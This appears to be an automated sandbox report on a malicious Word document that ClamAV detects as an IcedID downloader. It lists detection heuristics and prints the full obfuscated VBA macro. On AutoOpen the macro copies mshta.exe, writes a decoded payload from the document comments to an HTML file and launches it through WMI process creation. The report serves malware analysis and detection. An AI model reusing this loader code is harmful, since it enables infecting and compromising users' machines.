MALICIOUS
170
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.IcedID-87f88705f807f878-9951567-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.IcedID-87f88705f807f878-9951567-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject(aBksZ).create (a5UmG3) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12463 bytes |
SHA-256: 7afac1f6731717735a21aa4e9a8fb139b08f4619236794cce02ab90ef8818ab1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aW9j7O"
Function aCibvM(ahyM0E)
' Certitude banana glowered alder
' Reindeer inequality
' Earliest
' Unco reject
' Latex millions of
' Fairly thankless handiwork tucker
' Charming barb sarcophagus
' Antigua consolidation flirtation obligation forum
' Objectionable brutal actuality
' Guild screenshot aim detroit
' Befit intimate disciplines syntax syracuse
abcgNA = ahyM0E
aDB0y = Len(abcgNA)
For a8MZl = 0 To aDB0y - 1
' Pleasure opponent
aVt3Dw = aVt3Dw & Mid(abcgNA, (aDB0y - a8MZl), 1)
Next a8MZl
aCibvM = aVt3Dw
End Function
Public Function adzLy(avMp9)
adzLy = Replace(avMp9, ajYwl, "")
' Secret demolished social
End Function
Sub AutoOpen()
' Dram micah sponsor
apIHlP
End Sub
Attribute VB_Name = "alAGfJ"
Public Const aqLWa As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
Public Const ajYwl As String = ")"
Public Const aVzJ1 As Integer = 12441 / 957
Function a4MsXz()
End Function
Sub a2NVJ(avNCqk)
' Scandinavian polished
' Emulation celery surgical
' Popped seasonal lode
' Tolerate budgets oddity cove
' Uterus plain broader
' Midsummer gracefulness
' Unabashed nodes trapping artemis
' Gear qv exigency mp icons
' Trustees clam genres
' Norman urns rather
' Classics creak
' Deterioration diploma fallen truss machinist
' Pun subscriptions disgorge
' Cod
' Mph sniff premise legendary
' Lop mole zambia
' Angus chapters ha sudan
' Hodge parishes
' Ezra corps herodotus kind dalton
' Titanium disaster computer disheartened doug unacceptable
' Word fur melbourne snorting
' Seer drip bibliographic victual radius
' Situations manufacture declamation brothers
' Temperatures publicity inverness trade
' Mesa impiety hat worst ru
' Flue theoretical
' Stuart taxi heinous
' Phi forgotten
' Dom around look recurrence
' Finger
' Retention residence voicing
' Dint concepts fresh fillet elope
' Coated insurgent informed
' False
' Fur goad beginning
' Loaves bestial losses
' Exorbitant toll
' Cloud eric
' Excel undid repellent melbourne immobility
' Column chios penmanship ilk
' Dream rye ewe piss
' Bodice sententious agreements saucy chuckle winters janitor
' Acquisition frivolity il
' Formation
' Immersion appertain steve pantheism
' Tobago ozone twenty-third
' Conical tire biol shadow abomination
' Holly suite gulp
' Juvenile witch gen houston
' Guidance inertia accommodations techniques height cir bush
' Hasan contractor af
' Thumb capabilities jar foundry folks
' Navigation planes centralization
' Picket
' Ghent pedestal
' Mediator mounts admitted happening bastion ain
' Recognized re
End Sub
Function ahPNq(af2Nv)
ahPNq = ActiveDocument.BuiltInDocumentProperties(af2Nv)
End Function
Public Sub aDUiYj()
If 29696 / 464 < 234 Then
Call absw5c
End If
End Sub
Public Sub amfxE()
If 29696 / 464 < 234 Then
Call a7F9d
End If
End Sub
Attribute VB_Name = "aIjkx"
Public Function a7Cjh(a3Djiq, ao0cO)
' Precision raillery angelic guests
' Weighted
' Newer evolution
' Disruption secretariat
' Idle tenn. undisputed structural
' Staunch claret
' Karen abroad hobble
' Marketplace savour smug ver coax
' Revealed pacify barmaid collaboration
' Cubit morris games
' Switch
' Opus valparaiso tomato
' Evaluations incoherent
' Operatic carnage earliest metaphor yahoo
' Mart warming helping
' Dub favourites limpid truth
' Verbal pollyanna rail allotment blogger
' Marble housewife dna abusing wc
' Aqueduct raise
' Yea muffler jonah
' Dissemble untidy
' Hodge separable
' Pill phlegm illegal
' Admonition moderate
' Asset palmy waterproof audit linux nine
' Quicken mem
' Tangent arable slavonic missile arrested
' Hotel animus southern
' Hobart simpleton plus trio
' Chemical lea
' Target decorating admonition massage inform
' Bibliography besotted louis
' Inside traction age dies partisan
' Estrangement organizer workout fluffy
' Jan efficacy
' Princess groin
' Olympics enliven mussulman
' Johns restore sacerdotal
' Electricity iron neville Word soluble
' Kabul closer vishnu main warnings
' Directly tit conducts
' Ton sanyo cp
' Anachronism centers cheese
' Ae xerxes revolution
' Epistolary details marion screen warnings
' Incarceration minor completing leant sheffield membrane
' Mother-of-pearl relinquish
' Lose tuft believed
' Wen spencer
' Technology golf fame cox
' Cowl deeps mediterranean chen hundred
' Passageway incompleteness bibliographic slovenia
' Peel phenomenon
FileNumber = FreeFile
Open a3Djiq For Output As #FileNumber
Print #FileNumber, ao0cO
' Tv mustang ae
Close #FileNumber
End Function
Sub a9mEZ(a7MBHt, aKQUSr)
' Employ rear-guard mosquitoes gage lull
' Buying
' Hiv
' Discussing
' Sentient
' Workforce
' Nicole quilt saturated premiere
' After conjunction airplane risky bitch
' Clink customise
' Shortening lights residue
' Nude levy falling portuguese
' Mechanisms cheque
' Keno react scope seas wealth
' Unreliable witness hardwood
' Nominative wrongfully linux mesh enjoyable remind
' Denied si congo persian
' Stability
' Cordon tickle prairie severe
' Veracity idyllic eat
' Lovable richards corners writers
' Mp
' Drowsiness shovel circumcised annexation
' Cum acacia cherub cheers desultory gingerly
' Dive sex tapioca glen restored spurious admiringly
' Looking
FileCopy a7MBHt, aKQUSr
End Sub
Function aB9Tja(afeY7)
aB9Tja = afeY7
End Function
Attribute VB_Name = "a1FGn"
Sub apIHlP()
aDUiYj
' Microsoft headstrong parking winter
' Slighting arbor efficacy demolished
' Resound tuesday
' Plume infringe vellum albania
' Registration romany apex complimentary
' Hew guatemala
' Ethics warren remained
' Apprise hugh tendril come
' Cree glucose
' Symbolic flu concentrate
' Ellipse twenty-seven
' Surfaces psychiatry herbal
amfxE
' Iceberg colorless flicker alexandra
' Exploration scheme
' Hormone
' Inclusion beneficial quantitative no familiar karen
' Rubber clairvoyant bonds towel
' Burn industries
' Venice
' Balloon pentium flaccid
' Traditional exhortation lisbon
' Derrick dictation
' Expansys refugee pan
aBksZ = adzLy(aCibvM(aqLWa))
' Versatile
CreateObject(aBksZ).create (a5UmG3)
End Sub
Attribute VB_Name = "a4ody"
Function aUA1i()
' Roseate
' Epson folder
' Conn. treasurer church
' Expiate giants gambler division
' Adults leeds vietnamese copyist
' Democrats squabble transform
' Amanda adaptation washstand
' Mick trousseau ethnic
' Cruiser including deviation patriarchal customs
' Portend cohen knock
aUA1i = VBA.Split(aCibvM("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
End Function
Function apuwz(aUQjf)
aeRL8V = aUA1i()
' Headquarters suzanne
' Council roan hun appeals conclusions
' Postal consanguinity
' Chad
' Tires
' Baby written
' Ho
' Compact introducing hansen
' Momentarily cycling expected
' Lurk phosphoric dash
' Warrior reparation relentless
' Inadvertently
' Dance animals views
' Million benediction
' Insulated thoughtlessness cook
' Cleavage operate gibe
' Myanmar intel interred
' Following
' Sitemap scabbard inspired
' Collector manifesting
' Ail ko unripe
' Builder occasional accentuated
' Reader jeer ink event with
' Examines terry investors
Select Case aUQjf
' Recipients concentrations
Case 0:
' Switch induction joel
' Sixth searching talker cactus
' Urgent noteworthy
' Undefiled clusters weeding halifax clothing ambassador
' Cn
' Burlington vermin
' Legends enlightenment
' Favourites insignia storing
' Cornet hamper
' Zum scroll pounds fired client
' Thermal
apuwz = aeRL8V(1)
' Went
Case 1:
' Innkeeper bent failure weird
' Beverly mini poster
' Vacuum ordering bernard heb.
' Drawback duplicate conservatory median rotary polo
' Requested alexander
' Tim destroy constituent
' Authoritative pci
' Malign burdett pedantic crayon systems
' Took pertain
' Statewide kingston monetary
' Accelerate demure discussions sie finished
apuwz = aeRL8V(2)
Case 2:
apuwz = aeRL8V(3)
End Select
End Function
Sub a7F9d()
aG6jlm = akqrMT(apuwz(2))
a7Cjh aG6jlm, a3xJ5(ahPNq("comments"))
End Sub
Attribute VB_Name = "a43KB0"
Function axeMW(a5ABmN)
axeMW = adzLy(a5ABmN)
End Function
Function aUOe4r(aCwfb9)
aUOe4r = (adzLy(aCwfb9))
End Function
Function akqrMT(aDafY)
' Blackguard
akqrMT = (adzLy(aDafY))
End Function
Function a5UmG3()
aeshT4 = aUOe4r(apuwz(1))
a27WoN = akqrMT(apuwz(2))
a5UmG3 = aeshT4 & " " & a27WoN
End Function
Sub absw5c()
aRbAXS = axeMW(apuwz(0))
aeshT4 = aUOe4r(apuwz(1))
a9mEZ aRbAXS, aeshT4
End Sub
Function aQL5oB(a9fei)
aQL5oB = a9fei + 349 - 323
End Function
Function aQWmO(ajxWe3)
If ajxWe3 = 0 Then
aQWmO = 7139 - 7138
' Commenting reproductive broadcast
' Neighborhood
' Renaissance hittite b suite distillation
' Petit comm start
' Best message vom pansies plastic
' Metaphor locally ripped trash
' Uruguay casualty authority varied classifieds
' Agonising turnip minuet makes
' Designate teas
' Arizona mazda speculator shuffling
' Versus indication seventy-two sw flickr
' Purplish
' Peak underlie handicapped crouch
ElseIf ajxWe3 = 5 Then
aQWmO = 12 + 85
Else
aQWmO = 29696 / 29
End If
End Function
Function anuyYd(a9fei, aEt68Q)
anuyYd = a9fei - aEt68Q
End Function
Function ar2mi(a9fei)
ar2mi = Chr(a9fei)
End Function
Attribute VB_Name = "aPXnWT"
Function a3xJ5(auIRrA) As String
Dim aYpQO As Long
Dim aLgFl As Integer
Dim a4LsK As Integer
For aYpQO = 1 To VBA.Len(auIRrA) Step 1
a4LsK = 0
' Tantamount lid
' Suit coherent
' Funky cornfield angle
' Souls test
' Navigator habitat
' Plaza visited abdication
' Grammar leathery upskirt spectral prefer octave
' Sodium thumping sudden
' Do carrion difficulty uncanny sphinx
' Alluring circumcised sig
' Extravagantly propose admission utils
atKzAT = Mid(auIRrA, aYpQO, 1)
aLgFl = Asc(atKzAT)
' Queens wally defines roulette shipping towers
' Mason billy thumbnail angel
' Sail lout bump
' Fatty preliminary cord
' Rss chain
' Officious deaden same theoretic cowl
' Phone
' Pj deep
' Venue schooling vertigo sophie every
' Condemning projector reel
' Scientific windfall bleeding
' Cobbler minstrel mythical eucalyptus
' Pestilent
' Dispatch ian
' Bizarre sallies witness oak
' Preside boulder convert dais
' Ancestry backbone demur
' Wither fresh
' Bibliography median av daughters treasurer
' Thrall robin planned
' Zeb vindication container
' Brain callow existence
' Boorish sweeten sat.
' Confounding motherless console superseded
' Wasp marks gloucestershire lasso
' Bass stream bremen
' Subsides snorting hoarding seek
' Congress elliott embedded
' Demoralization bureau identified
' Respected topsail spec saintly quell
' Ochre
' Cherubim
' Extends accrue appointment investments staying mysql surpass
' Ladle pus so-and-so zimbabwe assessment
' Indebtedness
' Reveal smashing deal voyuer tarried sugar
' Assiduously mastiff
' Channel locally nothing oldest returns men
' There
' Largely shuffling alternation
' Spice exceptionally demagogue innovation nc
' Dc
' Approvingly amicably harem costumes duty
If (aLgFl > 64 And aLgFl < 91) Or (aLgFl > 96 And aLgFl < 123) Then
a4LsK = aVzJ1
aLgFl = anuyYd(aLgFl, a4LsK)
If aLgFl < aQWmO(5) And aLgFl > 83 Then
aLgFl = aQL5oB(aLgFl)
ElseIf aLgFl < 18395 / 283 Then
aLgFl = aQL5oB(aLgFl)
End If
End If
' Characterized telegraphic
' Snout
' Reverse hopes
' Implicitly lobe patricia leavings surgeons since
' Unbalanced
' Merge
' Statistics buoyant parable
' Inflammation fib specialized
' Bologna notoriety lovable deficit center
' Abstained britannica
aVvR6 = ar2mi(aLgFl)
' Lotus shrapnel
' Winsome famous retribution teddy desultory
' Appurtenances negative patio
' Rent misshapen
' Beverage
' Dictatorial smilies
' Dale dump lil cede
' Sufficiently thoroughbred
' Consistently ideas geo
' Atop boob linda
' Classical lassie paleness
Mid$(auIRrA, aYpQO, 1) = aB9Tja(aVvR6)
Next
a3xJ5 = auIRrA
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 52224 bytes |
SHA-256: 7f90667a90d40ba5b1ad8365feac57c37e78cc49af29ff3bfa27258a190f4e9b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.